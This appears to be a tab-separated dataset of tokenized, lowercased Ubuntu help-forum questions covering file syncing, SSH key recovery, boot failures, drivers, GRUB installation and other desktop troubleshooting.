406513	unison vs rsync + mounted remot drive	so my situation is that i want to my development files - ruby & php - available to all of my machines when i am home and away . when i asked the question before ( mount my webserver as a drive in win7/8 ) i was told to use version control software but i do n't want to be downloading a local copy and working on it so that i then have to upload the new version and re-download the new version to all the machines . there 's no group of developers here just me and most of my dev/debug issues come from writing code and testing it one machine but then forgetting to update my other machines . thus i want a sync 'd copy of the files on all of my machines . i was considering using owncloud on one of my webservers for other reason anyways and gives my win machines easy access to the files . my win machines have the owncloud update client that works like google drive 's or dropbox 's with sync'ing happening on what appears to be a timer . the owncloud update client on my ubuntu machines did n't want to install and i 'm using a mix of desktop and server versions . so my ubuntu machines simply mount the owncloud directory via davfs2 and ( in once i get this worked out ) they will use rsync on a cron to create a local copy - that way my machines can continue to work if the server with the owncloud files goes down . but then i ran across mention of unison which i 'd never heard of before . it seems that unison is a program meant to do the same thing as differential rsync . have i misunderstood ? unison sounds like it is built for syncing files across servers so i would n't have to worry about keeping the remote server 's mount up and running or re-establishing the mount before executing a differential rsync . however , all of the tutorials i 'm finding on unison suggest that you have to open up ssh to root logins . maybe i 'm worried about nothing but that seems like a bad idea . questions : am i correct that allowing a root login on ssh is a bad idea for security reasons ? are there advantages to unison that i 've overlooked ? are there issues with rsync that i 've overlooked ? such as wiping out my local copy if the mount of the remote server goes down and now the directory looks empty . are there performance advantages to unison over rsync or vice versa ? finally , is there a way to monitor mounts and re-establish automatically if they die ? i could use write something to check for specific contents on the mount but that seems prone to problems . thanks
406514	trying to load 13.10 on a ancient dell laptop	i 'm new to linux & ubuntu and i 'm trying to install 32 bit saucy salamander on a ancient dell laptop inspiron 600 m with 52 gb storage , 2 gb ram , and an intel pentium m 1.60 ghz processor just to see what its all about but when it starts to load , i get a message saying `` this kernel requires the following features not present on the cpu : pae unable to boot . please use the kernel appropriate for your cpu '' . so , can it be done ?
406517	regarding installation of windows 8 alongside ubuntu 12.04	i have purchased a laptop that came with an ubuntu 12.04 lts comes as an pre-installed os . i want to install windows 8 alongside with ubuntu 12.04 . how can i do that ? can i download gparted and create extra ntfs partitions and install windows 8 ? ?
406521	how to display a yuv image on ubuntu	how can i display a yuv image on ubuntu ? i have installed `` image magick '' on ubuntu , but when i try it , it said i must specify image size : display ~/downloads/tulips_yuv422_inter_planar_qcif.yuv display : must specify image size `~/downloads/tulips_yuv422_inter_planar_qcif.yuv ' @ error/yuv.c/readyuvimage/145 . but i do n't know the image size , can program detect that for me ? thank you .
406525	/proc kcore too big	after experiencing a ddos attack , somehow /proc/kcore is very huge , i use a small php class to check the current disk space , and how many has been used . it shows the following : total disk space : 39.2 gb used disk space : 98 gb free disk space : 811.6 mb my question is , is it save to delete the /proc/kcore file ? or is there a solution on getting it to an normal size . the filesize of /proc/kcore is 140.737.486.266.368 bytes i have hosted my server at digitalocean . if any more information needed to know , please ask ; ) many thanks !
406526	restore ssh key from txt	i had saved my private and public ssh key contents to a text file , and i recently had to reinstall ubuntu meaning i lost most of the stuff that was in my home folder . now , i would like to restore my ssh keys from the txt file . here 's the procedure that i 'm using thus far : mkdir ~/.ssh nano ~/.ssh/id_rsa.pub # copy/paste public key nano ~/.ssh/id_rsa # copy/paste private key but when i try to connect to a remote host that has my key , i get : agent admitted failure to sign using the key . searching for that led me to try : ssh-add which asks me to enter the passphrase , which i have and enter correctly , yet i receive an error : bad passphrase , try again for /home/brandon/.ssh/id_rsa how do i fix this and restore my ssh keys from copy/pasted text ? information requests openssh_6.2p2 ubuntu-6ubuntu0.1 , openssl 1.0.1e 11 feb 2013 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to snipped [ snipped ] port 22. debug1 : connection established . debug1 : identity file /home/brandon/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/brandon/.ssh/id_rsa-cert type -1 debug1 : identity file /home/brandon/.ssh/id_dsa type -1 debug1 : identity file /home/brandon/.ssh/id_dsa-cert type -1 debug1 : identity file /home/brandon/.ssh/id_ecdsa type -1 debug1 : identity file /home/brandon/.ssh/id_ecdsa-cert type -1 debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.2p2 ubuntu-6ubuntu0.1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1.1 debug1 : match : openssh_5.9p1 debian-5ubuntu1.1 pat openssh_5* debug2 : fd 3 setting o_nonblock debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-rsa-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-gcm @ openssh.com , aes256-gcm @ openssh.com , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-gcm @ openssh.com , aes256-gcm @ openssh.com , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5-etm @ openssh.com , hmac-sha1-etm @ openssh.com , umac-64-etm @ openssh.com , umac-128-etm @ openssh.com , hmac-sha2-256-etm @ openssh.com , hmac-sha2-512-etm @ openssh.com , hmac-ripemd160-etm @ openssh.com , hmac-sha1-96-etm @ openssh.com , hmac-md5-96-etm @ openssh.com , hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , umac-128 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5-etm @ openssh.com , hmac-sha1-etm @ openssh.com , umac-64-etm @ openssh.com , umac-128-etm @ openssh.com , hmac-sha2-256-etm @ openssh.com , hmac-sha2-512-etm @ openssh.com , hmac-ripemd160-etm @ openssh.com , hmac-sha1-96-etm @ openssh.com , hmac-md5-96-etm @ openssh.com , hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , umac-128 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa snipped debug1 : host 'snipped ' is known and matches the ecdsa host key . debug1 : found key in /home/brandon/.ssh/known_hosts:1 debug1 : ssh_ecdsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/brandon/.ssh/id_rsa ( 0x7f80ce9c7630 ) , debug2 : key : /home/brandon/.ssh/id_dsa ( ( nil ) ) , debug2 : key : /home/brandon/.ssh/id_ecdsa ( ( nil ) ) , debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/brandon/.ssh/id_rsa debug2 : we sent a publickey packet , wait for reply debug1 : server accepts key : pkalg ssh-rsa blen 279 debug2 : input_userauth_pk_ok : fp snipped agent admitted failure to sign using the key . debug1 : trying private key : /home/brandon/.ssh/id_dsa debug1 : trying private key : /home/brandon/.ssh/id_ecdsa debug2 : we did not send a packet , disable method debug1 : next authentication method : password
406527	input lag after nvidia update	i 'm using ubuntu 13.10 with bumblebee and nvidia 331 from xorg-edgers in a ideapad u430 . i used to be able to play games like metro ll using bumblebee without any problems , but since a couple of weeks i 'm getting horrible input lag that makes the game unplayable . i 'm not using the 319 because it was n't able to start the video card for some reason and the 331 was the only one that worked . is there any solution or should i just wait until they push a fixed driver ?
406528	how to compile a c code to call an octave function and make the gui using gtk+2	i am trying to call a octave function from c code but the problem is that when why run this command in octave mkoctfile -- mex addition_gui.c error occurs addition_gui.c:1:20 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . # include < gtk/gtk.h > # include `` mex.h '' void mexfunction ( int nlhs , mxarray *plhs [ ] , int nrhs , const mxarray *prhs [ ] ) { mxarray *in [ 2 ] , *out [ 1 ] ; in [ 0 ] = mxcreatedoublescalar ( 1 ) ; in [ 1 ] = mxcreatedoublescalar ( 2 ) ; mexcallmatlab ( 1 , out , 2 , in , `` addition '' ) ; mexcallmatlab ( 0 , null , 1 , out , `` disp '' ) ; mxdestroyarray ( in [ 0 ] ) ; mxdestroyarray ( in [ 1 ] ) ; mxdestroyarray ( out [ 0 ] ) ; } void static call ( gtkwidget *widget , gpointer data ) { g_print ( `` \n % s\n '' , gtk_entry_get_text ( gtk_entry ( data ) ) ) ; gint a=3 ; gint b=2 ; gint x ; x=a+b ; char y [ 4 ] ; sprintf ( y , `` % d '' , x ) ; gtk_entry_set_text ( gtk_entry ( data ) , y ) ; } int main ( int agrc , char *agrv [ ] ) { gtk_init ( & agrc , & agrv ) ; gtkwidget *entry , *window , *button , *hbox ; window=gtk_window_new ( gtk_window_toplevel ) ; g_signal_connect ( window , '' delete-event '' , g_callback ( gtk_main_quit ) , null ) ; hbox=gtk_hbox_new ( 0,0 ) ; gtk_container_add ( gtk_container ( window ) , hbox ) ; button=gtk_button_new_with_mnemonic ( `` add '' ) ; entry=gtk_entry_new ( ) ; const char* sum= '' 3+2 '' ; gtk_entry_set_text ( gtk_entry ( entry ) , sum ) ; g_signal_connect ( button , '' clicked '' , g_callback ( call ) , entry ) ; g_signal_connect ( entry , '' activate '' , g_callback ( call ) , entry ) ; gtk_box_pack_start ( gtk_box ( hbox ) , button,0,0,0 ) ; gtk_box_pack_start ( gtk_box ( hbox ) , entry,0,0,0 ) ; gtk_widget_show_all ( window ) ; gtk_main ( ) ; return 0 ; }
406531	ca n't reach wi-fi signal on ubuntu , but can do it on other os/devices ( ath9k )	i have two laptops , both running ubuntu 13.10 , as well as a different os ( windows 7 ) , dual boot on both . my wi-fi router is on my bedroom and i want to get the wi-fi signal from the living room . i can reach the wi-fi signal from both pcs when running windows , with a relative good signal , but ca n't reach it on both of them when running ubuntu , ca n't even connect to it . is there something that i can do to amplify the wi-fi signal ?
406532	disappearing dropbox icon , ca n't uninstall and reinstall	my dropbox icon from the top bar has disappeared . i have tried to uninstall and reinstall as suggested in an answer to someone with a similar problem but sudo apt-get remove dropbox gets the reply `` virtual packages such as dropbox ca n't be removed '' . then i tried sudo apt-get remove dropbox ; rm -rvf ~/.dropbox ~/.dropbox-dist ( from the dropbox site ) which removed some items but not dropbox itself . what do i do ? i am using 12.04 and am new to ubuntu . i still have the launcher icon and the folder but changes/new files do n't upload automatically .
406536	error when installing ubuntu on a windows 8 ( 32-bit ) system	i 'm a windows 8 user . recently , i wanted to use ubuntu along with win8 . so , i downloaded wubi and started installing it . it successfully installed and rebooted . during rebooting it asked me which os i want to use . i chose ubuntu it continued and showed me the ubuntu logo but after a few seconds it showed an error like this ( initramfs ) windows is hibernated or refused to mount . failed to mount '/dev/sda3 ' : operation not permitted . the ntfs is in an unsafe state ... ... ... could n't find the iso /ubuntu/instal/installation.iso this also happens if the file system is n't clean ... ... . any one has any idea what to do ? thanks in advance : )
406539	how do i prevent ubuntu one from connecting automatically ?	i actually use ubuntu one sometimes . so i did n't plan on uninstalling it . it starts up automatically upon login . it is not listed in my startup applications . in ubuntu1 settings i unchecked connect automatically on start-up but it continues to do so . i changed my password using the online web form . somehow my ubuntu one installation already knows the password thus continues to connect automatically . creep factor rising .
406542	lubuntu 13.10 does not boot , corrupt filesystem ?	i have been using lubuntu on my laptop for some time now , it 's the first linux based os i have owned and i 'm still not very well versed with the finer aspects of the system . a couple of days ago the laptop was shutting down regularly when it ran out of battery , after recharging i left it be until the next day . started the computer , it booted up into the passphrase screen for accessing the encrypted partition ( on which pretty much everything is stored ) . when i input my password and press enter , it says `` cryptsetup : sda_5 crypt set up successfully '' , hesitates in that state for a while , and then enters busybox v.1.20.2 , the shell interface ( with initramfs ) . as i did n't know what to do , i tried to input `` exit '' but it said /init : line 352 : ca n't open /root/dev/console : no such file and went into kernel panic . i booted into live mode from my usb and tried accessing the files thinking that i could just grab my files and reinstall lubuntu , as a lazy and quick way out of the situation . but when i try to mount the main volume , it asks for the passphrase , i input it and press connect . it hesitates for a bit and says error waiting for cleartext object after unlocking /dev/sda5timed out waiting for object i press ok and try accessing the volume again , this time it says error mounting /dev/dm1 at /media/lubuntu/ ... long filepath ... exited with non-zero exit status 31 : mount : wrong fs type , bad option , bad superblock on /dev/mapper/lubuntu -- vg-root , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so after that i installed the ubuntu boot-repair tool and used the `` recommended repair '' here is the pastebin link for it : paste from boot-repair i tried booting up again and nothing seems to have changed . this is the point where i ask for help because i cba to fight with it too much , i 'll probably only mess it up more : ) thanks in advance !
406543	unable to set a shortcut to grab screenshot area	i currently have ubuntu 13.10 . at some point the default shortcuts shift+prn and ctrl+shift+prn stopped working . simply pressing prn ( captures the entire screen ) works , pressing alt+prn to capture only active window works as well , only the shortcut for area clipping does n't work for some reason . some more facts : manually running gnome-screenshot -a works as expected ! changing the action to another key combo does n't help disabling the action and instead adding a custom shortcut with the command gnome-screenshot -a as answered here does n't help either here 's a screenshot of my keyboard settings : any ideas ? p.s . in compizconfig settings manager , the commands plugin is turned off update @ falconer 's answer has helped locate the problem , here 's the output of a script that simulates key presses and dumps programs that intercept them : $ xdotool keydown `` shift+print '' ; xdotool key `` xf86loggrabinfo '' ; xdotool keyup `` print '' ; sleep 1 ; xdotool keyup `` shift '' ; tail /var/log/xorg.0.log [ 25474.641 ] ( ii ) printing all currently active device grabs : [ 25474.641 ] active grab 0x4220d336 ( core ) on device 'virtual core keyboard ' ( 3 ) : [ 25474.641 ] client pid 2196 xneur [ 25474.641 ] at 25474411 ( from passive grab ) ( device thawed , state 1 ) [ 25474.641 ] core event mask 0x3 [ 25474.641 ] passive grab type 2 , detail 0x0 , activating key 50 [ 25474.641 ] owner-events false , kb 1 ptr 1 , confine 0 , cursor 0x0 [ 25474.641 ] ( ii ) end list of active device grabs it 's obvious from this log that in my case it was xneur ( layout switcher program ) .
406544	gimp `` levels '' editor starting up very slowly	during the last months , the `` levels '' editor ( colorâlevels ) was starting up slower and slower â but only when called up via the menus . called up a second time by clicking the image ( when it was the last tool used ) made it show up immediately . but even when called up a second time via the menus , the slowness persisted . recently , it reached the threshold of being unbearable , taking more than 10s to show up . i 'm not aware of any configuration changes or software installs which could have caused this as a side-effect , so i 'm clueless of what the culprit might be .
406551	sandisk imagemate sddr-99 5-in-1 card reader help	i am trying to use a sandisk brand card-reader but the system does not respond when i plug in an sd card . the sandisk website lists only windows as a compatible os for this device , but i have seen ones like it listed in other posts under the lsusb command . this has led me to believe that it is possible to have one of these devices function properly in ubuntu . here are some command responses : : ~ $ lsusb bus 001 device 002 : id 0781:9919 sandisk corp. card reader this is with the sd card plugged in : : ~ $ df -h filesystem size used avail use % mounted on /dev/sda1 58g 15g 41g 26 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.6g 4.0k 3.6g 1 % /dev tmpfs 728m 1.2m 727m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.6g 1.6m 3.6g 1 % /run/shm none 100m 64k 100m 1 % /run/user /dev/sdb1 913g 94m 867g 1 % /drives/bigdrive : ~ $ sudo lshw *-scsi:3 physical id : 7 logical name : scsi6 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk unclaimed description : scsi disk physical id : 0.0.0 bus info : scsi @ 6:0.0.0 any help would be greatly appreciated . i should mention that sandisk released a firmware upgrade that allows it to read sdhc cards which i also need help figuring out how to install . update per chili 555 's advice , here is what happens with the tail command : whoopsie [ 1075 ] : online kernel : [ 204.926446 ] usb 1-5 : reset high-speed usb device number 2 using ehci-pci kernel : [ 215.165315 ] usb 1-5 : reset high-speed usb device number 2 using ehci-pci whoopsie [ 1075 ] : online whoopsie [ 1075 ] : online kernel : [ 231.398841 ] usb 1-5 : reset high-speed usb device number 2 using ehci-pci kernel : [ 231.650615 ] usb 1-5 : reset high-speed usb device number 2 using ehci-pci kernel : [ 241.889494 ] usb 1-5 : reset high-speed usb device number 2 using ehci-pci kernel : [ 242.026819 ] sd 6:0:0:0 : device offlined - not ready after error recovery whoopsie [ 1075 ] : online *i omitted two lines about the last message being repeated x number of times . update # 2 i have run the update and upgrade commands as suggested , but still receive to response from the system upon inserting the sd card . i thought i would try another tail command : tail -f /var/log/syslog jan 21 23:37:08 matthew-ms-7721 kernel : [ 15628.768716 ] usb 8-1 : new usb device found , idvendor=0781 , idproduct=9919 jan 21 23:37:08 matthew-ms-7721 kernel : [ 15628.768723 ] usb 8-1 : new usb device strings : mfr=3 , product=4 , serialnumber=5 jan 21 23:37:08 matthew-ms-7721 kernel : [ 15628.768727 ] usb 8-1 : product : imagemate 5 in 1 reader/writer jan 21 23:37:08 matthew-ms-7721 kernel : [ 15628.768730 ] usb 8-1 : manufacturer : sandisk jan 21 23:37:08 matthew-ms-7721 kernel : [ 15628.768733 ] usb 8-1 : serialnumber : 0301243418 jan 21 23:37:08 matthew-ms-7721 kernel : [ 15628.769853 ] usb-storage 8-1:1.0 : usb mass storage device detected jan 21 23:37:08 matthew-ms-7721 kernel : [ 15628.769976 ] scsi7 : usb-storage 8-1:1.0 jan 21 23:37:08 matthew-ms-7721 mtp-probe : checking bus 8 , device 3 : `` /sys/devices/pci0000:00/0000:00:10.1/usb8/8-1 '' jan 21 23:37:08 matthew-ms-7721 mtp-probe : bus : 8 , device : 3 was not an mtp device jan 21 23:37:09 matthew-ms-7721 kernel : [ 15629.769502 ] scsi 7:0:0:0 : direct-access generic storage device 9312 pq : 0 ansi : 0 jan 21 23:37:09 matthew-ms-7721 kernel : [ 15629.769960 ] sd 7:0:0:0 : attached scsi generic sg3 type 0 all of that makes it seem like the system sees it , but can not control it . just my two cents .
406552	ssd causes occasional 100 % iowait and freeze . how can i fix this ?	my problem : sometimes my computer or just some applications freeze and i can see iowait ( with system-monitor-tool ) jump to 100 % ( on some or all cores ) for like 15 seconds . this is extremely annoying . i have this problem since i put a new ssd into my computer . i have my root and home partition on the ssd . i know it 's caused by the ssd because i used the computer before with the same configuration except with a hdd and i did n't have this problem . also sometimes ( but not always ) after the freeze the home partition is mounted read-only and when i restart i get an fsck error for /home , which is easily fixed by pressing `` f '' . what i tried : iotop : does n't show the jump of iowait . trim : i suspected that the discard option caused this , i disabled it but still got the same problem . i now run a script with fstrim on every boot . hardware issue : i checked for hardware fails with s.m.a.r.t . but did n't see anything unusual . any ideas what else i can try to fix this ?
406555	dell laptop usb 3.0 external hard drive boot	my dell laptop has both usb 2.0 and usb 3.0 ports . i have installed ubuntu 12.04 on a usb 3.0 external hard drive . it can boot from the usb 2.0 port , but not from the usb 3.0 port . it seems to me the bios wo n't recognize usb 3.0 drives in the boot menu . i 've done some research about grub , but it does n't seem to address the usb 3.0 issue . is there any other way that i can boot from the usb 3.0 port ? i found a discussion related to the same issue . it seems like it 's a hardware issue . in such case , is there any other workaround ? if it is impossible , and that i have to boot entirely from the usb 2.0 port , what are some ways to speed up ubuntu ? is it possible to use two drives , and put the home folder and maybe some programs on the drive connected to the usb 3.0 port ?
406556	broken dependencies after attempting to install apacheopenoffice	so a few days ago i tried installing apacheopenoffice , and the instructions i read was to uninstall libreoffice-common so i did that with the terminal . then all the sudden i’m seeing all these errors come up and i’m getting confused . so i uninstall apacheopenoffice and just try to go back to libreoffice . and i get these errors : http : //paste.ubuntu.com/6763795/ if this keeps happening i’m going to be left with just having to reinstall ubuntu . if i do so i 'll make sure to check the md5sum of the iso this time . but if anyone can help me fix this i would be happy .
406559	how does ubuntu one know my new password when i change it through the web form ?	i changed my ubuntu one password through the `` edit personal details online '' button . both my windows and ubuntu one installations continue to work without updating the login information . i changed my password because i was worried someone else was using my account . but if their installations login info was also updated automatically it defeats the purpose of changing the password at all .
406560	changed folder in /media to owncloud www permissions , how do i change it back ?	i changed the folder permissions on my raid array that is located in /media/nas to the owncloud permissions ( something like www : www ) , i did not like owncloud and i want to change the permissions back , i use samba on the drive and now can not access the files on windows . how would go about this ?
406561	ubuntu does not suspend via ( ir ) rc , but suspend via keyboard does work	i connected a microsoft ir receiver to my gigabyte brix ( core i5 4200u ) running ubuntu 13.10 . the code for my ir receiver is : bus 002 device 005 : id 0471:0815 philips ( or nxp ) ehome infrared receiver when i press the standby button on the rc ( microsoft mce rc ) the led on the ir receiver lights up but nothing happens . when i press the standby button on my keyboard the system goes to suspend immediately . running pm-suspend does also work . does anyone know how to get this working with the ir remote ? or to debug it ? i also tried it with ubuntu 12.10 but this did n't work either . out of the box resume from standby did n't work either but i got that working by creating a rule to /etc/udev/rules.d/90-mcewakeup.rules as described in thread http : //ubuntuforums.org/showthread.php ? t=1968487 . so resume works but suspend does n't . i need to control this by remote control as this machine will be used as htpc , and i do n't like to fallback to windows 7 where both suspend and resume with ir work out of the box ... note : when i connect the ir receiver to a laptop running ubuntu 12.10 the remote will put the machine successfully in suspend .
406563	symlink /var/www directory	i have been trying to create a symlink : /var/www - > /home/user/code/ following http : //stackoverflow.com/questions/9104337/create-a-symbolic-link-of-directory-in-ubuntu , i entered the following command : sudo ln -s /var/www /home/user/code however the result is n't what i expect . my link is stored inside the /www directory instead of linking the www directory itself . i use apache as the local web server , for my case , i have to access my code as localhost/code/project whereas i wish to have something like localhost/project the code directory should just serve as a directory where i store all my projects . anything i 'm missing out ?
406569	resolution changed after restart	i recently had a problem with not detecting microphone . it fixed itself after restart and repairing broken packages but after that i ca n't change screen resolution to the correct one , it not even a option . im using ubuntu 12.4
406573	bash built-ins with no manual entries	why do some bash built-ins ( such as dirs , pushd or help ) do n't have manual entries ?
406575	kernel panic when booting ubuntu 12.04 lts in virtualbox	i try to run it in virtualbox 4.3.6 but it says : kernel panic : attempted to kill init ! can anyone help me ? ? ?
406580	how to set up apache/mysql/django environment for development	i 've only been able to find tutorials to set up apache/mysql/django on servers , but i 'd like to set up an environment on my machine for development . does anyone have any good tutorials or suggestions ? thanks in advanced ! edit : if there is n't a good one , let 's team up and write one !
406581	why is grub failing to install ?	i 'm trying to install ubuntu server to a raid5 array . i have three , 3tb disks , each with a gpt partition table . i have set up my partitions as follows : /dev/sda 1 . 512 mb physical raid volume 2 . 3 tb pysical raid volume /dev/sdb 1 . 512 mb physical raid volume 2 . 3 tb physical raid volume /dev/sdc 1 . 512 mb physical raid volume 2 . 3 tb physical raid volume the raid volumes are grouped into two md devices : 1 . 1.5 gb raid5 ( mount point : swap ) 2 . 6.0 tb raid5 ( mount point : / ) installation proceeds normally until it is time to install grub2 . i get an error that reads : unable to install grub in /dev/sda executing `grub-install /dev/sda` failed . this is a fatal error . why is this happening and what can i do to fix it ?
406586	cp and mv alternative with better merge support ?	i am looking for an alternative to the standard cp and mv command line tools , specifically i am looking for features such as : detailed progress bar/reports dry-run support support for merging directories no overwrite warning when source and destination files are identical conflict resolution on overwrite ( i.e . rename one of the files ) copying to multiple targets at once multi-threading ( i.e . continue copying in the background while i handle conflict resolution in the foreground ) so basically a feature set similar to what the windows 8 explorer can do when copying or moving files around . ps : rsync with -- progress -- recursive -- remove-source-files -- checksum -- backup is somewhat usable for merging directories , but still far from perfect , as it only removes source files , not directories and it does n't really have much in terms of interactively resolving conflicts .
406587	how to install skype ubuntu 12.04 and later	many people are having troubles during skype installation , because dpkg commands change in later ubuntu releases . method i am using is mentioned here .
406593	koalawriter - segmentation fault ( core dumped )	i just downloaded the tar.gz file for the `` koalawriter '' , a word editor that helps focus on the writing . in the terminal i went to the folder `` koalawriter '' in my home directory , then did exactly what was described in the readme.txt . after that the program does n't run with the error `` segmentation fault ( core dumped ) '' . what could be wrong and how could it be fixed ? am using kubuntu 12.04 . i read general posts about segmentation faults , but it seems to depend on each software 's case . any experience with koalawriter ? install instructions of the readme.txt : to compile this application you need the qt4 library , you can find it here : http : //qt.nokia.com . you need the phonon module for the audio . on a debian or derivates systems ( ubuntu , kubuntu , linux mint ecc . ) you can install dependecies by typing : sudo apt-get install build-essential qt4-dev-tools libphonon-dev to compile type : qmake and then : make to run type : ./koalawriter
406597	does ubuntu installer automatically install in `` / '' ?	the first time i installed ubuntu gnome 13.10 , ichecked the option something else in the ubuntu installer and went through the partition process / , /home , swap . now , after a bad taste while trying gnome 3.10 , i decided to clean the slate and use reinstall ubuntu gnome ( the one that does n't mess with documents ) and something crossed my mind when i clicked next : does ubuntu installer automatically recognize and reinstall in ( / ) or should i have used gparted and do it manually ?
406601	compaq presario 2100	i am trying to install ubuntu on my old laptop . it was full of viruses and running windows xp . i was able to system restore it . but it has all the programs of a computer from 2002 . so it 's hard to launch websites . i downloaded ubuntu 12 desktop . but i am unable to open the iso file . i am also unable to burn it to a disc as cdrs i have are 700mb and this is 707 . really ? i also installed the infrarecorder to burn dvds . but it wo n't open . any help ? i 'd like to salvage this pc and give ubuntu a try .
406603	how to install ubuntu on hp split x2	i would like to install ubuntu 13.10 on this laptop . i have a usb installation disk . when i boot up with it i get to the menu with option to try ubuntu without installing . when i select this option screen goes blank . specs hp split 13 x2 pc processor : intel core i5-4202y 1.60-ghz processor ( 3.00-mb l3 cache , dual core , 4.5 w ) chipset : integrated system on chip ( soc ) platform controller hub ( pch ) graphics internal graphics : intel high-definition graphics support for hd decode , dx11 , hdmi , and px 5.0 panel 13.3-in ( 1920×1080 ) , full high-definition ( fhd ) , light emitting diode ( led ) , antiglare ( ag ) touchscreen with multitouch enabled ; 16:9 wide aspect ratio ; typical brightness : 400 nits ; slim ( 3.0-mm ) , uwva , support for edp 13.3-in ( 1366×768 ) , hd , led , ag , touchscreen with multitouch enabled ; 16:9 wide aspect ratio ; typical brightness : 200 nits ; slim ( 3.0-mm ) , support for edp
406606	how to install cling ?	i am trying to install cling in ubuntu 12.04 . i thought that the proper way was to download the binaries , as they are available here , but the extracted folder looks like this : ~/desktop/cling âť ls bin docs include lib share this requires , i think , to merge the directories content with some directories of my filesystem . i am not familiar with this method but it seems to me a bit dirty ; how can i install it , upgrade it , delete it ? i was thinking about packaging it with a deb , but i never did one so i do not know if it is the correct way.. is there a better way to install cling ?
406609	how to change boot image	how do i change the image that appears during boot back to the ubuntu default ? i had installed gnome desktop before and after uninstall it had left it like that .
